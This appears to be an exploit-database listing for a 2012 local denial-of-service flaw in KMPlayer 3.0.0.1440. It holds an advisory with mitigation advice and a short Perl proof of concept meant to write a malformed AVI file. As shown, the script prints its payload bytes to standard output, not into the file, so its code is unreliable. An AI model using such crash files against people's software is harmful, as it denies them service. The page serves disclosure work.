header-logo
Suggest Exploit
vendor:
KMPlayer
by:
Am!r
7,8
CVSS
HIGH
Local Denial-of-Service
N/A
CWE
Product Name: KMPlayer
Affected Version From: 3.0.0.1440
Affected Version To: 3.0.0.1440
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

KmPlayer v3.0.0.1440 Local Crash PoC

KMPlayer is prone to a local denial-of-service vulnerability. An local attacker can exploit this issue to crash the affected application, denying service to legitimate users. KMPlayer 3.0.0.1440 is vulnerable; other versions may also be affected.

Mitigation:

Update to the latest version of KMPlayer
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/56322/info

KMPlayer is prone to a local denial-of-service vulnerability.

An local attacker can exploit this issue to crash the affected application, denying service to legitimate users.

KMPlayer 3.0.0.1440 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
#Title : KmPlayer v3.0.0.1440 Local Crash PoC
#Discovered By : Am!r
#Home : http://IrIsT.Ir/forum/
#tested : XP
#TNX : Alireza , C0dex , B3hz4d

my $po="\x46\x02\x00\x00";

open(C, ">:raw", "poc.avi");

print $po;

close(C);